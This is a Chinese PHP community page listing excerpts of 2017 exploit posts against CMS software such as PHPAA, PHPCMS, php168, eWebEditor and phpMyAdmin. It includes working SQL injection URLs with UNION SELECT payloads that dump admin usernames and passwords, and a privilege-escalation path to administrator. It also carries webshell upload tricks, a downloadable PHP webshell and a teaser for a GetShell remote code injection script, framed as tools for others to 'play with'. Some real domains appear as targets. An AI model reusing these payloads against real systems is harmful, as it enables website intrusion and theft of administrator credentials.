• PHPAA(show.php)注入漏洞{注入测试}http:www.xiaoweio.cnphpaaCMSshow.php?id-194unionallselect1,2,3,4,5,6,7,8,9,10,concat(username,0x3a,password),12,13,14,15fromcms_users--影响版本:FooSun5.0官方地址:http:www.phpaa.cn ... [详细]
       2017-11-11 19:35:02
  • 作者:lucifer关键字:inurl:readingarticle.phpEXP:,2,username,password,5,6,7,8,9,10,11,12%20from%20c_adminhttp:www.xxx.comreadingarticle.php?id-1011%20union%20%20select%201注意,这次爆出的MD5需要注意下,因为他的加密方式很特殊! ... [详细]
       2017-11-11 18:52:01
  • PHPCMS系统adsclass.phpSQL注入漏洞作者:Unknow影响版本:phpcms2008sp4_UTF8_100510程序介绍:Phpcms是一款基于PHP+Mysql架构的网站内容管理系统,也是一个开源的PHP开发平台。Phpcms采用模块化方式开发,功能易用便于扩展,可面向大中型站点提供重量 ... [详细]
       2017-11-11 17:18:02
  • php168获取管理员0day1.注册普通用户2.通过memberbuygroup.php?jobbuygid3购买管理员权限。进入后台功能中心---模版设置----增加系统模版页保存php不成功的话试试其他的后缀,例如txt成功了保存为.php;1.txt同理。。。 ... [详细]
       2017-11-11 13:05:01
  • 昨天搞个东西,主站没权限,打开www.tmdsb.net旁了一下。就两个站。打开另一个站习惯性的在网址后加了个admin暴出后台,程序为PHPCMS2008。在网上找了一些0day。对它全失效。最后用那个上传文件的漏洞才搞定。(原来那漏洞:http:www.tmdsb.com ... [详细]
       2017-11-11 10:42:01
  • 我汗。现在连官方多可以日。大家去测试吧。听说是一个小日本发现的。汗颜 ... [详细]
       2017-11-11 10:31:02
  • phpMyAdmin3.X远程代码执行漏洞php版本exploit。来自t00sl的站长老君。其实前段就有EXP了。听大家说鸡肋的很,当时俺也就没去关注。在说这年头想找到phpMyAdmin的目录是很难的。3.几的版本也碰到的很少。但经过大牛们的研究后,说这个0day其实可以不 ... [详细]
       2017-11-11 09:04:01
  • 一个叫菲哥哥暴的漏洞。一下暴了好多洞。呃,以前还认为PHPaa蛮安全的。呵,大牛看不上它莫非?俺喜欢注入。就发注入这个的吧。其它的自己百度一下。漏洞文件:adminpage.add.phpadminmessage.action.phpadminarticle.add.phpsearch.php$use ... [详细]
       2017-11-11 07:44:01
  • PHP版本的ewebeditor用的比ASP版本的少的多吧,俺是非常少碰到。貌似听说国外用的非常多。台湾人喜欢用?用的着的关注一下吧。EXP如下:titleeWebeditoR3.8forphp任意文件上EXPtitleformactionmethodpostenctypemultipartform-dataINPUTTYPE ... [详细]
       2017-11-11 06:41:01
  • 一个PHP的webshell。老外那K来的,貌似很不错,跟C99,c98,c97那些差不了多少。SHELL界面很黑很暴力。来张图。alucar.phpalucar.php下载 ... [详细]
       2017-11-11 02:24:02
  • php后台插一句话的思路加114网址导航后台拿webshell的方法。首先介绍下php的各种标签:1):?php?demo:?phpechotest;?这个标签现在程序大多都是使用的这种标签!大家都不陌生了,这里就不多介绍了!2):?echotest;?这种标签是在以前很普 ... [详细]
       2017-11-10 21:39:02
  • 玩滥了,丢给大家玩吧。现在命中率还不错哦。直接GETSHELL。一句话密码为cEXP:#!usrbinphp?phpprint_r+---------------------------------------------------------------------------+PHPCMSRemoteCodeInjectGetShellExploitGoogleDork:Powe ... [详细]
       2017-11-10 19:02:01
扫码关注 PHP1 官方微信号
PHP1.CN | 中国最专业的PHP中文社区 | PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | PHP问答
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved PHP1.CN 第一PHP社区 版权所有